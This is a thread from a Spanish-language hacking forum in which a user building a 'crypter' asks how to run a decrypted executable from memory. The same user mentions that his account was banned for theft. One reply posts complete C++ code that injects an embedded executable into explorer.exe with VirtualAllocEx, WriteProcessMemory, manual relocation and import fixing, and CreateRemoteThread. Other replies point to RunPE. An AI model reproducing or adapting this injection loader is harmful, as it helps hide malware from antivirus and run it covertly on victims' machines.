Duda , cripter runtime

willyf · Mensajes: 20 Registrado: 09 May 2011, 02:32

por willyf Sin síntomas

Hola gnete , soy willy force
me an vuelto a banear la cuenta por robo y uso indevido :S
pero bueno aqui esoit de nuevo , espero dejen mi cuenta de una vez ...

Esta duda supongo que va dirigida sobretodo a linkgl y Drinky94, que son los mas activos en esta sección , plix

Pues bien la cosa esta , tienes tu archivo encriptado , se desencripta en memoria , y luego como lo ejecuto desde ahi , sin tener que crear un nuevo exe o algo de eso . Como tendria que guardar los datos a ejecutar ? y como los abro luego ? esque e estado buscando de diversas maneras y lo e pensado de otras formas , pero no caigo . Pense en una vez guardado el codigo del exe desencriptado en memoria , hacer que la siguiente instruccion fuese la primera del exe en memoria , se podria hacer tambien asi ?

Perdonen si no me explico bien o algo me lo dicen y corrijo lo que sea ;)

Gracias y byeee

linkgl

por linkgl Usa camisa de fuerza

Jeje necesitas un RunPE, el RunPE se encarga de acomodar la estructura del ejecutable en la memoria haciendo uso del PE del mismo creando un proceso, escribiendo los datos en la memoria y continuando el hilo para que el ejecutable corra, jeje si no tienes idea del PE pues está claro que no podrás crear uno por ahora pero hay muchos ya hechos públicos puedes encontrarte uno en el source del cryptic usa el buscador si quieres para encontrarlo.

//mHmm..

willyf · Mensajes: 20 Registrado: 09 May 2011, 02:32

por willyf Sin síntomas

linkgl escribió:Jeje necesitas un RunPE, el RunPE se encarga de acomodar la estructura del ejecutable en la memoria haciendo uso del PE del mismo creando un proceso, escribiendo los datos en la memoria y continuando el hilo para que el ejecutable corra, jeje si no tienes idea del PE pues está claro que no podrás crear uno por ahora pero hay muchos ya hechos públicos puedes encontrarte uno en el source del cryptic usa el buscador si quieres para encontrarlo.

Muchas gracias crackk , juesto lo que queria ;) , con eso ya me da para seguir buscando otro buen rato jejej

No he encontrando ningun source de c++ , pero ya que me lo dices buscare mejor . Tambien he leido una funcion que colgaron en un post , pero no quiero usar codigo sin comprenderlo . Buscare sobre el RunPe y intentare comprender los ejemplos posteados, ya te cuento :p

Saludos

por p0is0n-123 Incurable

Te recuerdo que puedes usar el código de [Zero] que inyecta el ejecutable completo en un proceso... viene a ser un RunPe, sin embargo no crea un nuevo proceso...

Mostrar/Ocultar

Código: Seleccionar todo

#pragma comment (linker,"/NODEFAULTLIB")
#pragma comment (linker,"/ENTRY:main")

#include <windows.h>
#include <Tlhelp32.h>
#include "resource.h"

int main()
{
	PIMAGE_DOS_HEADER IDH;
	PIMAGE_NT_HEADERS INTH;
	PIMAGE_SECTION_HEADER ISH;

	//Cargamos el resource
	HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE");
	DWORD ResourceSize=SizeofResource(NULL,hResource);
	HGLOBAL hGlob=LoadResource(NULL,hResource);
	LPSTR lpFileMaped=(LPSTR)LockResource(hGlob);

	//Obtenemos la cabecera DOS y PE en las estructuras
	IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0];
	INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew];

	DWORD PID=0;
	HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	PROCESSENTRY32 pInfo;
	pInfo.dwSize=sizeof(PROCESSENTRY32);

	//Obtenemos el PID del 'explorer.exe'
	Process32First(hSnapshot,&pInfo);
	for(;lstrcmpA(pInfo.szExeFile,"explorer.exe");)
	{
		Process32Next(hSnapshot,&pInfo);
	}
	CloseHandle(hSnapshot);
	PID=pInfo.th32ProcessID;

	//Abrimos el proceso en el que nos inyectaremos
	HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID);

	//Creamos el buffer del tamaño del SizeOfImage en el que cargaremos el ejecutable
	LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);

	//Copiamos la cabecera DOS y PE al buffer
	WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0);

	//Copiamos las secciones en su VirtualOffset en el buffer
	for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++)
	{
		ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i];
		WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0);
	}

	//Calculamos el delta entre la dirección del buffer y el ImageBase
	DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase);

	//------------------------------------------------------------
	/* -Reubicamos la dirección base del ejecutable :D - */
	//------------------------------------------------------------

	//Si no hay tabla de reubicación, salimos
	if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0)
	{
		MessageBoxA(0,"No hay relocation table!",0,0);
		return false;
	}

	//Obteemos el Image Base Relocation
	//Copiamos el Image Base Relocation de los datos en el proceso a un buffer en el nuestro para
	//poder trabajar con él más comodamente
	PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION));
	PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
	ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);

	//Vamos recorriendo todas las etradas del bloque
	for (DWORD n=0;IBR->VirtualAddress>0;n++)
	{
		//Obtenemos el Bloque de reubicación
		LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress);

		//Obtenemos la primera entrada del bloque
		LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION));

		//Recorremos todas las entradas del bloque
		for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++)
		{
			WORD valor;
			ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0);
			//Obtenemos los 4 bits que definen el tipo de reubicación
			DWORD type=valor>>12;

			//Obtenemos los 12 bits que definen la dirección de la reubicación
			DWORD offset=valor&0xFFF;

			//Si el tipo de reubicación es relativo a la dirección base, añadimso el delta
			if(type==IMAGE_REL_BASED_HIGHLOW)
			{
				//Añadimos a la dirección que depende del imagebase original
				//el delta entre el imagebase y nuestra dirección base
				LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset);
				DWORD NewValue;
				ReadProcessMemory(hProcess,newAddr,&NewValue,4,0);
				NewValue+=Delta;
				WriteProcessMemory(hProcess,newAddr,&NewValue,4,0);
			}
		}

		//Vamos al siguiente bloque
		PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock);
		ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);
	}
	GlobalFree(IBR);

	//---------------------------------------------------------------------
	/* -Cargamos los valores de la IAT para poder llamar a las apis- */
	//---------------------------------------------------------------------

	PIMAGE_THUNK_DATA ITD;
	PIMAGE_THUNK_DATA PITD;
	PIMAGE_IMPORT_BY_NAME IIBN;

	//Comprobamos si hay Import Data Descriptor
	if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0)
	{

		//Obtenemos el Import Data Descriptor
		//Copiamos el Import Data Descriptor de los datos en el proceso a un buffer en el nuestro para
		//poder trabajar con él más comodamente
		PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR));
		PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
		ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);

		//Vamos recorriendo todas las Dll's importadas por el ejecutable
		for (;IID->Name;)
		{
			//Obtenemos la longitud del nombre de la dll
			DWORD szName=0;
			CHAR miByte=1;
			for(int i=0;miByte;i++)
			{
				szName=i;
				ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0);
			}

			//Obtenemos el nombre de la dll
			LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1);
			ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0);

			//Cargamos la dll
			HMODULE hLib=LoadLibraryA(lpName);

			//Obtenemos la dirección al primer miembro del array Image Thunk Data's
			PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk);
			ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA));
			ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);

			//Vamos recorriendo las funciones importadas
			for (;ITD->u1.Ordinal;)
			{
				miByte=1;
				//Obtenemos la longitud del nombre de la API
				for(int i=0;miByte;i++)
				{
					szName=i;
					LPSTR puntero=ExeBuffer+ITD->u1.Function+2;
					puntero+=i;
					ReadProcessMemory(hProcess,puntero,&miByte,1,0);
				}

				//Cargamos el Image Import By Name para obtener el nombre
				IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName);
				ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0);

				//Obtenemos la dirección de la función y la guardamos en la IAT
				DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name);
				WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Ejem!! Vaya metedura xD */

				PITD++;
				ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);
			}
			PIID++;
			ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);
			GlobalFree(lpName);
			GlobalFree(ITD);
		}
		GlobalFree(IID);
	}

	//Obteemos el EntryPoint de ejecutable que cargamos en el buffer
	DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint;

	//Llamamos al EntryPoint
	CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0);

	return 0;
}

Salud y Suerte...

Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf

willyf · Mensajes: 20 Registrado: 09 May 2011, 02:32

por willyf Sin síntomas

wow ¡¡ gracias poison , desde luego aun me queda MUCHO por aprender jejejej
enseguida me pondre a echarle un vistazo , haber como funciona eso :D

de nuevo gracias a ambos ¡¡¡
Saludos gentee ::bye::

willyf · Mensajes: 20 Registrado: 09 May 2011, 02:32

por willyf Sin síntomas

Saludos , espero que alguien vuelva a leer esto XD

Pues me he estado informando , como no , y no se podria crear un "hilo" para que una vez cargado el binario y antes de cerrarse el stub , ejecutara en el mismo preceso el codigo ?? Si es posible , no seria mas sencillo ? esque acabo de empezar a leer sobre los "hilos" y aun no me entero mucho , tampoco hay demasiada informacion en español y soy muy malo para el ingles

linkgl

por linkgl Usa camisa de fuerza

willyf escribió:Saludos , espero que alguien vuelva a leer esto XD

Pues me he estado informando , como no , y no se podria crear un "hilo" para que una vez cargado el binario y antes de cerrarse el stub , ejecutara en el mismo preceso el codigo ?? Si es posible , no seria mas sencillo ? esque acabo de empezar a leer sobre los "hilos" y aun no me entero mucho , tampoco hay demasiada informacion en español y soy muy malo para el ingles

Para ejecutarse en el mismo proceso usa el código que te dió p0is0n cuyo autor es [Zero] y lo que hace es lo mismo que el RunPE pero abriendo espacio en un proceso para inyectar el ejecutable alineando sus secciones, creando un nuevo thread(hilo) para llamar al binario desde el entrypoint y demás, algo complejo el código, jeje x) pues si tienes dudas sobre algo más también lo puedes postear jeje

//mHmm..

Duda , cripter runtime

Temas similares

Links sobre el tema

Variantes de tema

Duda , cripter runtime

Mostrar mensajes previos

Ordenar por

Temas similares

Links sobre el tema

Variantes de tema